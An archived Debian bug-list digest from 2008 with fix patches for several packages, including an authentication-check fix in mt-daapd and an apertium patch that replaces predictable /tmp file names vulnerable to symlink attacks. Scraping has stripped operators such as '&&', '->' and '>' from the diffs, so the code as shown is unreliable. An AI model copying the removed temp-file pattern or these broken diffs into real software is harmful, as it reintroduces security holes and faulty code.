+
+ -- Nico Golde [EMAIL PROTECTED]  Wed, 27 Aug 2008 14:53:45 +0200
+
 mt-daapd (0.9~r1696-1.3) unstable; urgency=high
 
   * Non-maintainer upload by the Security Team.
diff -u mt-daapd-0.9~r1696/debian/patches/00list mt-daapd-0.9~r1696/debian/patches/00list
--- mt-daapd-0.9~r1696/debian/patches/00list
+++ mt-daapd-0.9~r1696/debian/patches/00list
@@ -2,0 +3,2 @@
+03_fix-authentication
+04_taglib_api_calls
only in patch2:
unchanged:
--- mt-daapd-0.9~r1696.orig/debian/patches/04_taglib_api_calls.dpatch
+++ mt-daapd-0.9~r1696/debian/patches/04_taglib_api_calls.dpatch
@@ -0,0 +1,47 @@
+#! /bin/sh /usr/share/dpatch/dpatch-run
+## 04_taglib_api_calls.dpatch by Nico Golde [EMAIL PROTECTED]
+##
+## All lines beginning with `## DP:' are a description of the patch.
+## DP: No description.
+
[EMAIL PROTECTED]@
+diff -urNad mt-daapd-0.9~r1696~/src/scan-mpc.c mt-daapd-0.9~r1696/src/scan-mpc.c
+--- mt-daapd-0.9~r1696~/src/scan-mpc.c	2007-08-10 06:07:26.0 +0200
 mt-daapd-0.9~r1696/src/scan-mpc.c	2008-08-27 14:53:27.0 +0200
+@@ -70,31 +70,31 @@
+ len = strlen(val);
+ if ((pmp3-title = calloc(len + 1, 1)) != NULL)
+ strncpy(pmp3-title, val, len);
+-taglib_tag_free_strings(val);
++taglib_tag_free_strings();
+ }
+ if ((val = taglib_tag_artist(tag)) != NULL) {
+ len = strlen(val);
+ if ((pmp3-artist = calloc(len + 1, 1)) != NULL)
+ strncpy(pmp3-artist, val, len);
+-taglib_tag_free_strings(val);
++taglib_tag_free_strings();
+ }
+ if ((val = taglib_tag_album(tag)) != NULL) {
+ len = strlen(val);
+ if ((pmp3-album = calloc(len + 1, 1)) != NULL)
+ strncpy(pmp3-album, val, len);
+-taglib_tag_free_strings(val);
++taglib_tag_free_strings();
+ }
+ if ((val = taglib_tag_comment(tag)) != NULL) {
+ len = strlen(val);
+ if ((pmp3-comment = calloc(len + 1, 1)) != NULL)
+ strncpy(pmp3-comment, val, len);
+-taglib_tag_free_strings(val);
++taglib_tag_free_strings();
+ }
+ if ((val = taglib_tag_genre(tag)) != NULL) {
+ len = strlen(val);
+ if ((pmp3-genre = calloc(len + 1, 1)) != NULL)
+ strncpy(pmp3-genre, val, len);
+-taglib_tag_free_strings(val);
++taglib_tag_free_strings();
+ }
+ 
+ if ((i = taglib_tag_year(tag)) != 0)
only in patch2:
unchanged:
--- mt-daapd-0.9~r1696.orig/debian/patches/03_fix-authentication.dpatch
+++ mt-daapd-0.9~r1696/debian/patches/03_fix-authentication.dpatch
@@ -0,0 +1,19 @@
+#! /bin/sh /usr/share/dpatch/dpatch-run
+## 03_fix-authentication.dpatch by Nico Golde [EMAIL PROTECTED]
+##
+## All lines beginning with `## DP:' are a description of the patch.
+## DP: No description.
+
[EMAIL PROTECTED]@
+diff -urNad mt-daapd-0.9~r1696~/src/webserver.c mt-daapd-0.9~r1696/src/webserver.c
+--- mt-daapd-0.9~r1696~/src/webserver.c	2007-10-22 05:40:29.0 +0200
 mt-daapd-0.9~r1696/src/webserver.c	2008-08-27 14:49:35.0 +0200
+@@ -1131,7 +1131,7 @@
+ if((auth_handler)  (auth_handler(pwsc,NULL,NULL)==0)) {
+ /* do the auth thing */
+ auth=ws_getarg(pwsc-request_headers,Authorization);
+-if((auth)  (ws_decodepassword(auth,username, password))) {
++if((auth)  (0 == ws_decodepassword(auth,username, password))) {
+ if(auth_handler(pwsc,username,password))
+ can_dispatch=1;
+ ws_addarg(pwsc-request_vars,HTTP_USER,%s,username);


pgpah3i2XxugH.pgp
Description: PGP signature


Processed: reassign 496774 to newsbeuter

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.35
 reassign 496774 newsbeuter
Bug#496774: libmrss0: depends on a nonexistent package
Bug reassigned from package `libmrss0' to `newsbeuter'.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496772: newsbeuter: depends on a nonexistent package

2008-08-27 Thread Nico Golde
Hi Riccardo,
* Riccardo Stagni [EMAIL PROTECTED] [2008-08-27 13:53]:
[...] 
 (I filed a similar bugreport against libmrss0. If you think it's a fault
 in libnxml, please reassign/merge as appropriate)

I reassigned this one back to newsbeuter as it is only 
newsbeuters fault calling libnxml-depends and 
libmrss-depends in the rules file. A fix is on its way.

Cheers
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgprFy7F6O5k9.pgp
Description: PGP signature


Bug#482140: (pas de sujet)

2008-08-27 Thread 01

I experienced the same problem with my notebook.

Using Etch Stable (installed from the CD), then upgrading to Lenny (to 
get my Intel GMA965 chipset working well with 3D).

I've got a 32 bits Intel architecture (CPU = pentium M)

I solved the problem by :
- editing my /etc/apt/sources.list to switch back to etch
- apt-get remove docbook-xml (complains many times about 
update-xmlcatalog: error: entity not registered )

- apt-get update
- apt-get install docbook-xml
- editing /etc/apt/sources.list to update to lenny
- apt-get update
- apt-get dist-upgrade

That did it ;-)

Hope that helps.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#481134: Please hint poppler-data for lenny inclusion

2008-08-27 Thread Christian Perrier
Hideki Yamane a écrit :

  So I and other Japanese Debian developer/maintainer/package maintainer/
  users want poppler-data package to there, the CJK languages-desktop 
  tasks in tasksel. Please consider that.

The easiest way to have this to happen is by sending a wishlist bug
report against tasksel.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496640: marked as done (anon-proxy: fails to install if /etc/environment is empty)

2008-08-27 Thread Debian Bug Tracking System

Your message dated Wed, 27 Aug 2008 13:32:03 +
with message-id [EMAIL PROTECTED]
and subject line Bug#496640: fixed in anon-proxy 00.05.38+20080710-2
has caused the Debian Bug report #496640,
regarding anon-proxy: fails to install if /etc/environment is empty
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
496640: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496640
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: anon-proxy
Version: 00.05.38+20080710-1
Severity: serious
Justification: Policy 6.1.

If /etc/environment is empty, installation or removing/purging of anon-proxy 
fail. The reason is the grep call in 
line 50 of anon-proxy.postinst fails, if /etc/environment is empty. 

The same applies to line 29 of anon-proxy.prerm

As a result aptitude won't install/remove/upgrade any other package, making the 
system unusable/breaking security 
updates, etc. 

Workaround: create/remove/edit /etc/environment to be either a file with at 
least a 'space' in it or to be removed. 

Johannes

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (x86_64)

Kernel: Linux 2.6.25-2-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages anon-proxy depends on:
ii  adduser   3.110  add and remove users and groups
ii  debconf [debconf-2.0] 1.5.22 Debian configuration management sy
ii  libc6 2.7-13 GNU C Library: Shared libraries
ii  libgcc1   1:4.3.1-2  GCC support library
ii  libssl0.9.8   0.9.8g-13  SSL shared libraries
ii  libstdc++64.3.1-2The GNU Standard C++ Library v3
ii  libxerces-c28 2.8.0-3validating XML parser library for 

anon-proxy recommends no packages.

Versions of packages anon-proxy suggests:
pn  mixmaster none (no description available)
pn  mixminion none (no description available)
ii  tor   0.2.0.30-2 anonymizing overlay network for TC

-- debconf information:
* anon-proxy/environment: true


---End Message---
---BeginMessage---
Source: anon-proxy
Source-Version: 00.05.38+20080710-2

We believe that the bug you reported is fixed in the latest version of
anon-proxy, which is due to be installed in the Debian FTP archive:

anon-proxy_00.05.38+20080710-2.diff.gz
  to pool/main/a/anon-proxy/anon-proxy_00.05.38+20080710-2.diff.gz
anon-proxy_00.05.38+20080710-2.dsc
  to pool/main/a/anon-proxy/anon-proxy_00.05.38+20080710-2.dsc
anon-proxy_00.05.38+20080710-2_i386.deb
  to pool/main/a/anon-proxy/anon-proxy_00.05.38+20080710-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
David Spreen [EMAIL PROTECTED] (supplier of updated anon-proxy package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Wed, 27 Aug 2008 06:05:40 -0700
Source: anon-proxy
Binary: anon-proxy
Architecture: source i386
Version: 00.05.38+20080710-2
Distribution: unstable
Urgency: low
Maintainer: David Spreen [EMAIL PROTECTED]
Changed-By: David Spreen [EMAIL PROTECTED]
Description: 
 anon-proxy - Proxy to surf the web anonymously
Closes: 491932 492613 496640
Changes: 
 anon-proxy (00.05.38+20080710-2) unstable; urgency=low
 .
   * Translation updates and rc-fix release for Lenny.
   * Updated Finnish debconf translation (Closes: #492613).
   * Updated Swedish debconf translation (Closes: #491932).
   * debian/postinst  debian/prerm:
 - Don't ever let grep call return 1 to prevent package from
   installing, upgrading or purging due to empty /etc/environment
   file. Fixes RC bug. (Closes: 496640).
Checksums-Sha1: 
 5b66ffbfc3a37425e9678ecc0cc297d139af18c6 1173 
anon-proxy_00.05.38+20080710-2.dsc
 7b71079b1a35c7ce15e596061131f5dd9ec5238a 22435 
anon-proxy_00.05.38+20080710-2.diff.gz
 589466e39566b80a7f370d38addac23621886b46 128284 
anon-proxy_00.05.38+20080710-2_i386.deb
Checksums-Sha256: 
 da50f7b70a364efe59fe8ef9af904e6e28795e8ff63f92ef12812841bb42700b 1173 

Processed: Re: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 496395 confirmed patch
Bug#496395: The possibility of attack with the help of symlinks in some Debian 
packages
Tags were: security
Tags added: confirmed, patch

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#481134: Please hint poppler-data for lenny inclusion

2008-08-27 Thread Deng Xiyue
在 2008-08-27三的 15:58 +0200,Christian Perrier写道:
 Hideki Yamane a écrit :
 
   So I and other Japanese Debian developer/maintainer/package maintainer/
   users want poppler-data package to there, the CJK languages-desktop 
   tasks in tasksel. Please consider that.
 
 The easiest way to have this to happen is by sending a wishlist bug
 report against tasksel.
 

Though I'm not a maintainer of tasksel stuff, I think it's valid to
suggest the same to be done for Chinese(both simplified and traditional)
and Korean tasks as well, so that we save some bug number count :)

 
-- 
Regards,
Deng Xiyue, a.k.a. manphiz



signature.asc
Description: 	这是信件的数字签	名部分


Bug#496001: marked as done (python-coverage: Missing Depends: python-pkg-resources)

2008-08-27 Thread Debian Bug Tracking System

Your message dated Wed, 27 Aug 2008 13:32:06 +
with message-id [EMAIL PROTECTED]
and subject line Bug#496001: fixed in python-coverage 2.80-2
has caused the Debian Bug report #496001,
regarding python-coverage: Missing Depends: python-pkg-resources
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
496001: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496001
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: python-coverage
Version: 2.80-1
Severity: serious

It appears python-coverage should depend on python-pkg-resources:


$ python-coverage
Traceback (most recent call last):
  File /usr/bin/python-coverage, line 5, in module
from pkg_resources import load_entry_point
ImportError: No module named pkg_resources
$ python-coverage -e
Traceback (most recent call last):
  File /usr/bin/python-coverage, line 5, in module
from pkg_resources import load_entry_point
ImportError: No module named pkg_resources
$ apt-file search pkg_resources
python-pkg-resources: /usr/share/doc/python-pkg-resources/pkg_resources.txt.gz
python-pkg-resources: /usr/share/pyshared/pkg_resources.py
python-wxgtk2.8: 
/usr/lib/python2.4/site-packages/wx-2.8-gtk2-unicode/wx/tools/Editra/src/extern/pkg_resources.py
python-wxgtk2.8: 
/usr/lib/python2.5/site-packages/wx-2.8-gtk2-unicode/wx/tools/Editra/src/extern/pkg_resources.py


After installing python-pkg-resoures, I get no error message at least running 
the above commands.

Sami


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26.2 (SMP w/4 CPU cores; PREEMPT)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages python-coverage depends on:
ii  python2.5.2-2An interactive high-level object-o
ii  python-central0.6.8  register and build utility for Pyt

python-coverage recommends no packages.

python-coverage suggests no packages.

-- no debconf information


---End Message---
---BeginMessage---
Source: python-coverage
Source-Version: 2.80-2

We believe that the bug you reported is fixed in the latest version of
python-coverage, which is due to be installed in the Debian FTP archive:

python-coverage_2.80-2.diff.gz
  to pool/main/p/python-coverage/python-coverage_2.80-2.diff.gz
python-coverage_2.80-2.dsc
  to pool/main/p/python-coverage/python-coverage_2.80-2.dsc
python-coverage_2.80-2_all.deb
  to pool/main/p/python-coverage/python-coverage_2.80-2_all.deb
python-coverage_2.80.orig.tar.gz
  to pool/main/p/python-coverage/python-coverage_2.80.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Ben Finney [EMAIL PROTECTED] (supplier of updated python-coverage package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Fri, 22 Aug 2008 10:02:53 +1000
Source: python-coverage
Binary: python-coverage
Architecture: source all
Version: 2.80-2
Distribution: unstable
Urgency: medium
Maintainer: Lars Wirzenius [EMAIL PROTECTED]
Changed-By: Ben Finney [EMAIL PROTECTED]
Description: 
 python-coverage - code coverage tool for Python
Closes: 496001
Changes: 
 python-coverage (2.80-2) unstable; urgency=medium
 .
   [ Ben Finney ]
   * debian/control
 + Fix missing Depends: python-pkg-resources. Thanks to Sami Liedes for
   the bug report. (Closes: bug#496001)
Checksums-Sha1: 
 f4211cabf5194b3257571cfcbd80a60fc5b032f3 1224 python-coverage_2.80-2.dsc
 182ce686920567fa5f3a44b665d7f66fcc86cf58 13751 python-coverage_2.80.orig.tar.gz
 dbbec3510cbbd6ea552a164f0132d63e6b968400 3891 python-coverage_2.80-2.diff.gz
 8dafd31b6d2c3bc581adf69d495f2d04e7b8573c 19262 python-coverage_2.80-2_all.deb
Checksums-Sha256: 
 15c917e64ff5d79cc6a29176512eaf36b2e7add0b65455c3155298cc4d7aafd7 1224 
python-coverage_2.80-2.dsc
 a212da669fa5ec813479555e079bdde0d6d016daa9fe253528b0a4a579dacb22 13751 
python-coverage_2.80.orig.tar.gz
 

Bug#496395: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Moritz Muehlenhoff
tags 496395 confirmed patch
thanks

Dmitry E. Oboukhov wrote:
 Package: apertium
 Severity: grave
 
 Hi, maintainer!
 
 This message about the error concerns a few packages  at  once.   I've
 tested all the packages (for Lenny) on my Debian mirror.  All  scripts
 of packages (marked as executable) were tested.

Two patches fixing these issues are attached.

Cheers,
Moritz
--- apertium-3.0.7+1.orig/apertium/Makefile.in	2008-03-31 06:22:55.0 +0200
+++ apertium-3.0.7+1/apertium/Makefile.in	2008-08-23 19:37:13.0 +0200
@@ -1148,25 +1148,29 @@
 	@echo Creating apertium-gen-deformat script
 	@echo #!$(BASH)  $@
 	@cat deformat-header.sh  $@
+	@echo TMP_DEFORMAT=\`mktemp\`  $@
+	@echo TMP_LEX=\`mktemp\`  $@
 	@echo $(XMLLINT) --dtdvalid $(apertiumdir)/format.dtd --noout \$$FILE1  \\  $@
 	@if [ `basename $(XSLTPROC)` == xsltproc ]; \
-	  then echo $(XSLTPROC) --stringparam mode \$$MODE $(apertiumdir)/deformat.xsl \$$FILE1 /tmp/\$$\$$.deformat.l  \\; \
-  else echo $(XSLTPROC) $(apertiumdir)/deformat.xsl \$$FILE1 $$mode=\$$MODE\ /tmp/\$$\$$.deformat.l  \\; \
+	  then echo $(XSLTPROC) --stringparam mode \$$MODE $(apertiumdir)/deformat.xsl \$$FILE1 \$$TMP_DEFORMAT  \\; \
+  else echo $(XSLTPROC) $(apertiumdir)/deformat.xsl \$$FILE1 $$mode=\$$MODE\  \$$TMP_DEFORMAT  \\; \
   fi  $@ 
-	@echo $(FLEX) \$$FLEXOPTS -o/tmp/\$$\$$.lex.cc /tmp/\$$\$$.deformat.l  \\  $@
-	@echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I $(apertiuminclude) -o \$$FILE2 /tmp/\$$\$$.lex.cc  \\  $@
-	@echo rm /tmp/\$$\$$.deformat.l /tmp/\$$\$$.lex.cc  $@
+	@echo $(FLEX) \$$FLEXOPTS -o \$$TMP_LEX \$$TMP_DEFORMAT  \\  $@
+	@echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I $(apertiuminclude) -o \$$FILE2 \$$TMP_LEX  \\  $@
+	@echo rm \$$TMP_DEFORMAT \$$TMP_LEX  $@
 	@chmod a+x $@
 
 apertium-gen-reformat: Makefile.am gen-header.sh
 	@echo Creating apertium-gen-reformat script
 	@echo #!$(BASH)  $@
 	@cat gen-header.sh  $@
+	@echo TMP_REFORMAT=\`mktemp\`  $@
+	@echo TMP_LEX=\`mktemp\`  $@
 	@echo $(XMLLINT) --dtdvalid $(apertiumdir)/format.dtd --noout \$$FILE1  \\  $@
-	@echo $(XSLTPROC) $(apertiumdir)/reformat.xsl \$$FILE1 /tmp/\$$\$$.reformat.l  \\  $@
-	@echo $(FLEX) \$$FLEXOPTS -o/tmp/\$$\$$.lex.cc /tmp/\$$\$$.reformat.l  \\  $@
-	@echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I $(apertiuminclude) -o \$$FILE2 /tmp/\$$\$$.lex.cc \\  $@
-	@echo rm /tmp/\$$\$$.reformat.l /tmp/\$$\$$.lex.cc  $@
+	@echo $(XSLTPROC) $(apertiumdir)/reformat.xsl \$$FILE1  \$$TMP_REFORMAT  \\  $@
+	@echo $(FLEX) \$$FLEXOPTS -o \$$TMP_LEX \$$TMP_REFORMAT  \\  $@
+	@echo $(CXX) $(CXXFLAGS) -w $(APERTIUM_CFLAGS) -I $(apertiuminclude) -o \$$FILE2 \$$TMP_LEX \\  $@
+	@echo rm \$$TMP_REFORMAT \$$TMP_LEX  $@
 	@chmod a+x $@
 
 apertium-gen-modes: Makefile.am modes-header.sh
--- apertium-3.0.7+1.orig/apertium/apertium-header.sh	2008-02-05 07:49:07.0 +0100
+++ apertium-3.0.7+1/apertium/apertium-header.sh	2008-08-23 21:41:12.0 +0200
@@ -38,17 +38,17 @@
 
 function translate_odt
 {
-  INPUT_TMPDIR=/tmp/$$odtdir
+  INPUT_TMPDIR=`mktemp`
 
   locale_utf8
   test_zip
 
   if [[ $FICHERO ==  ]]
-  then FICHERO=/tmp/$$odtorig
+  then FICHERO=`mktemp`
cat  $FICHERO
BORRAFICHERO=true
   fi
-  OTRASALIDA=/tmp/$$odtsalida.zip
+  OTRASALIDA=/tmp/$RANDOM-$RANDOM-$RANDOM-odtsalida.zip
   
   unzip -q -o -d $INPUT_TMPDIR $FICHERO
   find $INPUT_TMPDIR | grep content\\\.xml |\
@@ -78,17 +78,17 @@
 
 function translate_docx
 {
-  INPUT_TMPDIR=/tmp/$$docxdir
+  INPUT_TMPDIR=`mktemp`
 
   locale_utf8
   test_zip
   
   if [[ $FICHERO ==  ]]
-  then FICHERO=/tmp/$$docxorig
+  then FICHERO=`mktemp`
cat  $FICHERO
BORRAFICHERO=true
   fi
-  OTRASALIDA=/tmp/$$docxsalida.zip
+  OTRASALIDA=/tmp/$RANDOM-$RANDOM-$RANDOM-docxsalida.zip
   
   if [[ $UWORDS == no ]]
   then OPCIONU=-u;
@@ -98,8 +98,9 @@
   unzip -q -o -d $INPUT_TMPDIR $FICHERO
   
   for i in $(find $INPUT_TMPDIR|grep xlsx$);
-  do $APERTIUM_PATH/apertium -f xlsx -d $DIRECTORY $OPCIONU $PREFIJO $i /tmp/$$xlsxembed;
- mv /tmp/$$xlsxembed $i;
+  TMP_XLSXEMBED=`mktemp`
+  do $APERTIUM_PATH/apertium -f xlsx -d $DIRECTORY $OPCIONU $PREFIJO $i  $TMP_XLSXEMBED;
+ mv $TMP_XLSXEMBED $i;
   done;
   
   find $INPUT_TMPDIR | grep xml |\
@@ -130,17 +131,17 @@
 
 function translate_xlsx
 {
-  INPUT_TMPDIR=/tmp/$$xlsxdir
+  INPUT_TMPDIR=`mktemp`
 
   locale_utf8
   test_zip
   
   if [[ $FICHERO ==  ]]
-  then FICHERO=/tmp/$$xlsxorig
+  then FICHERO=`mktemp`
cat  $FICHERO
BORRAFICHERO=true
   fi
-  OTRASALIDA=/tmp/$$xslxsalida.zip
+  OTRASALIDA=/tmp/$RANDOM-$RANDOM-$RANDOM-xslxsalida.zip
   
   unzip -q -o -d $INPUT_TMPDIR $FICHERO
   find $INPUT_TMPDIR | grep sharedStrings.xml |\


Processed: tagging 417142

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.29~bpo40+1
 tags 417142 pending
Bug#417142: depends on non-essential package debconf in postrm
Tags were: patch etch-ignore
Tags added: pending


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 severity 496402 normal
Bug#496402: The possibility of attack with the help of symlinks in some Debian 
packages
Severity set to `normal' from `grave'

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#417142: NMU for websvn

2008-08-27 Thread Thijs Kinkhorst
Hi Pierre,

This RC bug has now been open for two weeks. I'm uploading an NMU to the 
delayed-5 queue according to the attached patch. I hope this helps to keep 
websvn in good shape in lenny.


cheers,
Thijs
diff -u websvn-2.0/debian/changelog websvn-2.0/debian/changelog
--- websvn-2.0/debian/changelog
+++ websvn-2.0/debian/changelog
@@ -1,3 +1,10 @@
+websvn (2.0-2.1) unstable; urgency=high
+
+  * Non-maintainer upload.
+  * Fix unconditional use of debconf in postrm (Closes: #417142).
+
+ -- Thijs Kinkhorst [EMAIL PROTECTED]  Wed, 27 Aug 2008 15:56:07 +0200
+
 websvn (2.0-2) unstable; urgency=low
 
   * Upload to unstable
diff -u websvn-2.0/debian/postrm websvn-2.0/debian/postrm
--- websvn-2.0/debian/postrm
+++ websvn-2.0/debian/postrm
@@ -1,10 +1,12 @@
 #! /bin/sh
-# post remove script for wzdftpd
+# post remove script for websvn
 
 set -e
 
-. /usr/share/debconf/confmodule
-db_version 2.0 || [ $? -lt 30 ]
+if [ -f /usr/share/debconf/confmodule ]; then
+	. /usr/share/debconf/confmodule
+	db_version 2.0 || [ $? -lt 30 ]
+fi
 
 case $1 in
 	purge)
@@ -14,22 +16,24 @@
 
 		ucf -p /etc/websvn/svn_deb_conf.inc || true
 		rm -rf /var/cache/websvn/
-		db_get websvn/webservers
-		webservers=$RET
-		restart=
-
-		for webserver in $webservers; do
-			webserver=${webserver%,}
-
-			case $webserver in
-apache|apache-perl|apache-ssl|apache2)
-rm -f /etc/$webserver/conf.d/websvn
-test -x /usr/sbin/$webserver || continue
-restart=$restart $webserver
-			;;
-			esac
-		done
 
+		if [ -f /usr/share/debconf/confmodule ]; then
+			db_get websvn/webservers
+			webservers=$RET
+			restart=
+
+			for webserver in $webservers; do
+webserver=${webserver%,}
+
+case $webserver in
+	apache|apache-perl|apache-ssl|apache2)
+	rm -f /etc/$webserver/conf.d/websvn
+	test -x /usr/sbin/$webserver || continue
+	restart=$restart $webserver
+;;
+esac
+			done
+		fi
 		;;
 esac
 
@@ -47,7 +51,9 @@
 
 #DEBHELPER#
 
-db_stop
+if [ -f /usr/share/debconf/confmodule ]; then
+	db_stop
+fi
 
 exit 0
 


pgpeSFffM82rv.pgp
Description: PGP signature


Bug#496402: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Moritz Muehlenhoff
severity 496402 normal
thanks

On Sun, Aug 24, 2008 at 10:05:29PM +0400, Dmitry E. Oboukhov wrote:
 Package: aegis
 Severity: grave
 
 Hi, maintainer!
 
 This message about the error concerns a few packages  at  once.   I've
 tested all the packages (for Lenny) on my Debian mirror.  All  scripts
 of packages (marked as executable) were tested.

The affected scripts are only examples, lowering severity.

Cheers,
Moritz



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#483337: marked as done (mt-daapd: FTBFS: scan-mpc.c:73: error: too many arguments to function 'taglib_tag_free_strings')

2008-08-27 Thread Debian Bug Tracking System

Your message dated Wed, 27 Aug 2008 14:02:03 +
with message-id [EMAIL PROTECTED]
and subject line Bug#483337: fixed in mt-daapd 0.9~r1696-1.4
has caused the Debian Bug report #483337,
regarding mt-daapd: FTBFS: scan-mpc.c:73: error: too many arguments to function 
'taglib_tag_free_strings'
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
483337: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=483337
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: mt-daapd
Version: 0.9~r1696-1.3
Severity: serious
User: [EMAIL PROTECTED]
Usertags: qa-ftbfs-20080527 qa-ftbfs
Justification: FTBFS on i386

Hi,

During a rebuild of all packages in sid, your package failed to build on
i386.

Relevant part:
 if i486-linux-gnu-gcc -DHAVE_CONFIG_H -I. -I. -I..   -g -Wall -DWITH_HOWL 
 -DOGGVORBIS -DFLAC -DMUSEPACK -DHAVE_SQL -DHOST='i486-pc-linux-gnu' 
 -DNOT_HAVE_SA_LEN -DUSES_NETLINK -DHAVE_LINUX 
 -I/usr/include/avahi-compat-howl -I/usr/include/ffmpeg  -Wall -g 
 -DHAVE_VA_COPY -O2 -MT scan-mpc.o -MD -MP -MF .deps/scan-mpc.Tpo -c -o 
 scan-mpc.o scan-mpc.c; \
   then mv -f .deps/scan-mpc.Tpo .deps/scan-mpc.Po; else rm -f 
 .deps/scan-mpc.Tpo; exit 1; fi
 scan-mpc.c: In function 'scan_get_mpcinfo':
 scan-mpc.c:73: error: too many arguments to function 'taglib_tag_free_strings'
 scan-mpc.c:79: error: too many arguments to function 'taglib_tag_free_strings'
 scan-mpc.c:85: error: too many arguments to function 'taglib_tag_free_strings'
 scan-mpc.c:91: error: too many arguments to function 'taglib_tag_free_strings'
 scan-mpc.c:97: error: too many arguments to function 'taglib_tag_free_strings'
 scan-mpc.c:46: warning: unused variable 'f'
 make[4]: *** [scan-mpc.o] Error 1

The full build log is available from:
   http://people.debian.org/~lucas/logs/2008/05/27

This rebuild was done with gcc 4.3 instead of gcc 4.2, because gcc 4.3
is now the default on most architectures (even if it's not the case on
i386 yet).  Consequently, many failures are caused by the switch to gcc
4.3.
If you determine that this failure is caused by gcc 4.3, feel free to
downgrade this bug to 'important' if your package is only built on i386,
and this bug is specific to gcc 4.3 (i.e the package builds fine with
gcc 4.2).

A list of current common problems and possible solutions is available at 
http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!

About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
of the Grid'5000 platform, using a clean chroot containing a sid i386
environment.  Internet was not accessible from the build systems.

-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |


---End Message---
---BeginMessage---
Source: mt-daapd
Source-Version: 0.9~r1696-1.4

We believe that the bug you reported is fixed in the latest version of
mt-daapd, which is due to be installed in the Debian FTP archive:

